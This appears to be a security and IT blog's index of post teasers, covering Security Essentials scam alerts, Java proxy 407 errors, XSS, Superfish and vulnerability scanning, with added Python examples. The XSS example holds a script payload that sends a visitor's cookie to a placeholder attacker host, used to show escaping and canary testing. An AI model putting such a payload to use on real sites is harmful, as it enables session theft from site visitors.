Microsoft Security Essentials alerts – don’t call “Microsoft”

Last Tuesday night my oldest son came into the room and told me he thought one of our computers was being hacked. So I kicked into incident response mode and walked into the other room, to be greeted by a computer loudly announcing that Microsoft Security Essentials was unable to clean a virus and that I should immediately call Microsoft.

Instead I immediately shut down the computer. Here’s why.

Read more

407 error in Java with Forcepoint

I had a Java app pointing at a Forcepoint (formerly known as Websense) proxy server. The app wasn’t getting through the proxy, and was failing with an HTTP 407 (Proxy Authentication Required) error.

We had Websense set to require NTLM authentication, but it turns out Java won’t do NTLM, so the Java traffic wasn’t even showing up in the Websense monitor.

My workaround was to have users open a browser and visit any web page immediately before opening the app. The browser authenticates to the proxy with NTLM, Websense caches the credentials for that machine, and the Java app’s traffic then goes through on the strength of that cached session.

If you want, you can launch the applet from a batch file that uses IEcapt to hit any web page first, then starts the applet.
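The first thing to establish with a 407 is which authentication schemes the proxy is actually offering, since a proxy that is down and a proxy that only offers a scheme your client cannot speak look identical from inside the app. The following is an added example and not code from the original post: it decodes a proxy’s 407 reply and checks the offered schemes against what a client supports. Both replies are constructed to look like an NTLM-only challenge and a Basic challenge; the header names are the standard ones, and the client scheme set is an assumption stated in the comments.

```python
# Added example, not code from the original post: decode a proxy's HTTP 407
# reply and see which authentication schemes it offers, so you can tell an
# "NTLM-only proxy" failure apart from a proxy that is simply down.
# The two replies below are constructed; header names follow RFC 7235.
from typing import Dict, List, Tuple

NTLM_ONLY_REPLY = (
    "HTTP/1.1 407 Proxy Authentication Required\r\n"
    "Proxy-Authenticate: NTLM\r\n"
    "Proxy-Authenticate: Negotiate\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

BASIC_REPLY = (
    "HTTP/1.1 407 Proxy Authentication Required\r\n"
    'Proxy-Authenticate: Basic realm="corp-proxy"\r\n'
    "Content-Length: 0\r\n"
    "\r\n"
)

# Assumed client capability: Java's built-in HTTP client handles Basic and
# Digest; whether it can do NTLM depends on platform and runtime, which is
# the situation the post ran into.
BASIC_DIGEST_CLIENT = {"basic", "digest"}


def parse_response(raw: str) -> Tuple[int, Dict[str, List[str]]]:
    """Return (status code, headers). Repeated headers such as multiple
    Proxy-Authenticate lines are kept as a list, in order."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _colon, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def offered_schemes(headers: Dict[str, List[str]]) -> List[str]:
    """Scheme is the first token of each challenge ("Basic realm=..." -> basic,
    "NTLM <base64>" -> ntlm). One challenge per header line is assumed;
    comma-separated challenge lists are not handled here."""
    schemes: List[str] = []
    for value in headers.get("proxy-authenticate", []):
        if not value:
            continue
        scheme = value.split(None, 1)[0].lower()
        if scheme not in schemes:
            schemes.append(scheme)
    return schemes


def diagnose(raw: str, client_schemes: set) -> dict:
    """Summarise whether this client can satisfy the proxy's challenge."""
    status, headers = parse_response(raw)
    if status != 407:
        return {"status": status, "offered": [], "can_authenticate": None,
                "verdict": "no proxy challenge"}
    offered = offered_schemes(headers)
    usable = [s for s in offered if s in client_schemes]
    if usable:
        verdict = "client can use " + usable[0]
    else:
        verdict = ("proxy requires " + "/".join(offered)
                   + ", which this client does not speak")
    return {"status": status, "offered": offered,
            "can_authenticate": bool(usable), "verdict": verdict}


if __name__ == "__main__":
    for name, reply in (("NTLM-only", NTLM_ONLY_REPLY), ("Basic", BASIC_REPLY)):
        print(name + ":", diagnose(reply, BASIC_DIGEST_CLIENT)["verdict"])
```

To use it against a live proxy, capture the raw reply with a packet capture or a proxy debugger and feed it to `diagnose`; if the only schemes offered are NTLM and Negotiate, the browser-first workaround above (or a proxy rule that also offers Basic over an internal network) is the fix, not a change to the Java app.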

How I set up office hours in Google Voice

If you have a side business, you need to offer customer service, but it’s also perfectly reasonable to not want your phone to ring at 3 a.m. You can fix that if you set up office hours in Google Voice.

Fortunately, it’s easy to set up Google Voice to ring your phone during office hours and send calls straight to voice mail after hours. The nice thing is that Google Voice transcribes your messages, which makes it very easy to filter out people who are calling to solicit your services at 25 cents on the dollar. I can’t say for certain that people are more likely to do that at off hours. But it’s certainly more annoying to be awakened at 3 a.m. by someone wanting to lowball you. And yes, I speak from experience.

Here’s how you do it if you don’t want to be disturbed at unreasonable hours.

Read more

You might need a new router

Do you need a new router? If your Internet is slow after upgrading to a faster service, if your wi-fi range and reception are poor, or if your Internet connection just generally misbehaves a lot, you might need a new router.

Even the New York Times, of all places, has published articles extolling the virtues of new routers. If your wi-fi at home is bad, they say, think about picking up a TP-Link Archer C7 router. I like the Asus RT-AC66U myself. Either way, in my experience and that of my colleagues, a new router makes a huge difference.

When one longtime friend upgraded to a TP-Link Archer, he told me his wi-fi improved so much his wired network was suddenly struggling to keep up with it.

Read more

Change a headline, go to prison

A former journalist whose track record includes being fired from the Tribune Co. and from Reuters is facing two decades in prison for giving the hacking group Anonymous credentials to log into a Tribune web site and make changes.

Anonymous changed one headline, and it took about 40 minutes for someone at Tribune Co. to notice and change it back.

It reminds me of something that happened at the newspaper where I used to work.

Read more

IEcapt is a command-line web browser that outputs screenshots

Sometimes you need to capture a web page in PNG or JPG format. And if you need to do that, it probably helps to be able to do it in an automated fashion, like by a script.

That’s IEcapt’s purpose in life. IEcapt renders a web page using the Internet Explorer engine, then writes the result out as an image file. Uses include e-mailing a dashboard to someone or capturing steps for technical writing. Sure, you can use a tool like Snagit, but IEcapt is free and can be scripted.

If you need IEcapt, you probably already know it.

What cross-site scripting is and how to recognize it

In many security job interviews, the interviewer will ask about cross-site scripting, also known as XSS. Most descriptions of it are overly complex. The best description I’ve ever heard is just five words long: code execution in the browser.

That succinctly sums up the problem: you don’t want someone else to be able to inject code into your site that then runs in your visitors’ browsers, with whatever access those visitors have.
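To make “code execution in the browser” concrete, here is an added example that is not code from the original post: a search page rendered two ways, once pasting the query straight into the HTML and once escaping it, plus the canary check a tester uses to recognise a reflection point without running any script. The page template, the payload and the placeholder host `attacker.example` are all constructed for the example.

```python
# Added example, not code from the original post: one search page rendered
# two ways, plus the canary test a pentester uses to recognise reflection.
import html

# Constructed page template: the user's query lands inside an element body.
PAGE = "<html><body><h1>Results for: {q}</h1></body></html>"

# Constructed attacker input: sends the session cookie away if it executes.
# attacker.example is a placeholder host, not a real site.
PAYLOAD = ('<script>document.location="https://attacker.example/c?"'
           '+document.cookie</script>')


def render_unsafe(query: str) -> str:
    """Vulnerable: the query is pasted straight into the HTML, so markup
    in it becomes markup in the page the visitor's browser executes."""
    return PAGE.format(q=query)


def render_safe(query: str) -> str:
    """Fixed: escape <, >, &, " and ' so the query is shown as text. This
    is the right treatment for element bodies and quoted attributes; a
    value dropped into a script block or an unquoted attribute needs
    context-specific encoding instead."""
    return PAGE.format(q=html.escape(query, quote=True))


def contains_live_script(page: str) -> bool:
    """Crude indicator used only for this demo: a real <script> start tag
    survived into the output."""
    return "<script" in page.lower()


def reflects_unescaped(render, canary: str = '<"xsscanary">') -> bool:
    """How to recognise reflected XSS when testing: send a harmless marker
    containing the characters that matter and look for it coming back
    byte-for-byte. No script execution is needed to prove the flaw."""
    return canary in render(canary)


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD))
    print("safe:  ", render_safe(PAYLOAD))
    print("unsafe reflects unescaped:", reflects_unescaped(render_unsafe))
    print("safe reflects unescaped:  ", reflects_unescaped(render_safe))
```

The canary approach is what to reach for in an interview or a test: you are not looking for a popup, you are looking for your input’s `<`, `>` and `"` coming back unencoded in a context where the browser will interpret them.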

Read more

Why I don’t scan networks with my own credentials

I scan the network I’m paid and sworn to protect on a nearly daily basis. I ran into a problem with the account I use for that, and tested by scanning a small number of machines (my own and my cubicle neighbor’s) with my own account to make sure the problem was the account, not the tool.

Fixing the account has become a problem (my boss’ problem now), but when I told him about it, I said I could scan the network with my personal admin account, but didn’t want to. One reason has to do with liability and HR. The other, believe it or not, is technical.

Read more

Lenovo’s preinstalled Superfish spyware: A post-mortem

So, if you haven’t heard by now, last year Lenovo experimented with preloading its cheapest laptops with adware that subverts HTTPS by installing its own root certificate and intercepting secure connections, letting a third party inject ads into any web page and giving an attacker a ready-made place to hide while tampering with your supposedly secure transactions.

By the end of the day yesterday, Lenovo had apologized, sort of, and after several sites had provided removal instructions, Lenovo provided its own. After spending much of the day downplaying the security concerns, by the end of the day they were at least reluctantly acknowledging them.

This was really bad, and I’ll explain why in a second, and I’ll also try to explain why Lenovo did it.
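The practical check a practitioner wants here is whether a machine’s trust store still contains the interception root. The following is an added example and not code from the original post or from Lenovo: it walks the root certificates the Python `ssl` module trusts on the current machine and flags any whose subject or issuer matches a known-bad name. The name “Superfish, Inc.” comes from the public disclosure of the root certificate, not from this page, and the sample store is constructed.

```python
# Added example, not code from the original post: look through the root
# certificates Python trusts on this machine and flag any whose subject or
# issuer matches a known-bad name. The Superfish root carried
# "Superfish, Inc." as its organization and common name in the public
# disclosure; the sample store below is constructed.
import ssl
from typing import Iterable, List, Sequence

FLAGGED_NAMES: Sequence[str] = ("superfish",)


def cert_names(cert: dict) -> List[str]:
    """Flatten the subject and issuer from an ssl cert dict (the shape
    SSLContext.get_ca_certs() returns) into lowercase attribute values."""
    names: List[str] = []
    for field in ("subject", "issuer"):
        for rdn in cert.get(field, ()):
            for _attr, value in rdn:
                names.append(str(value).lower())
    return names


def is_flagged(cert: dict, patterns: Sequence[str] = FLAGGED_NAMES) -> bool:
    return any(p in name for name in cert_names(cert) for p in patterns)


def flagged_roots(certs: Iterable[dict],
                  patterns: Sequence[str] = FLAGGED_NAMES) -> List[dict]:
    return [c for c in certs if is_flagged(c, patterns)]


def scan_default_trust_store(patterns: Sequence[str] = FLAGGED_NAMES) -> List[dict]:
    """Check the CA store the Python ssl module loads by default. On Windows
    this is the system store, which is where Superfish installed itself."""
    ctx = ssl.create_default_context()
    return flagged_roots(ctx.get_ca_certs(), patterns)


def _rdn(**attrs) -> tuple:
    # Build a subject/issuer tuple in get_ca_certs() format:
    # ((('countryName', 'US'),), (('organizationName', '...'),), ...)
    return tuple(((k, v),) for k, v in attrs.items())


# Constructed sample: one ordinary root and one interception root.
GOOD_ROOT = {"subject": _rdn(countryName="US", organizationName="Example Trust Co",
                             commonName="Example Root CA")}
GOOD_ROOT["issuer"] = GOOD_ROOT["subject"]
BAD_ROOT = {"subject": _rdn(countryName="US", organizationName="Superfish, Inc.",
                            commonName="Superfish, Inc.")}
BAD_ROOT["issuer"] = BAD_ROOT["subject"]
SAMPLE_STORE = [GOOD_ROOT, BAD_ROOT]


if __name__ == "__main__":
    print("sample store hits:", [c["subject"] for c in flagged_roots(SAMPLE_STORE)])
    print("this machine's default store hits:", scan_default_trust_store())
```

Removing the adware is not enough on its own: the root certificate it installed has to go too, and because every affected laptop shipped with the same root and the same private key, any machine still trusting it can be impersonated to for any HTTPS site by whoever holds that key. On Linux the default context may load roots lazily from a directory, so an empty result there says less than it does on Windows.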

Read more

Yes, we need to run vulnerability scans inside the firewall

I got an innocent question last week. We’d been scanning an AIX server with Nexpose, the vulnerability scanner made by Rapid7, and ran into some issues. The system owner then asked: the server sits behind a firewall, has no direct connection to the Internet and holds no data itself; it’s just a front end to two other servers. Is there any reason to scan a server like that?

In my sysadmin days, I asked a similar question. Nobody could give me an answer that was any better than “because reasons.” So I’ll answer the question and give the reasons.

Read more